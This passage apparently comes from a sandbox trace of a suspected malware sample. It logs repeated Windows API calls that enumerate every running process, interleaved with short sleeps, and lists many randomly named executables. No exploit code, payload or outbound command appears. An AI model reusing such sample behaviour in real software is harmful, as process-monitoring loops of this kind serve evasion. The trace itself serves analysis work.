th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.087] CloseHandle (hObject=0xc4) returned 1 [0110.087] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.092] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.143] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.144] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.145] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.146] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.147] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.148] CloseHandle (hObject=0xbc) returned 1 [0110.148] Sleep (dwMilliseconds=0x12c) [0110.457] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.463] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 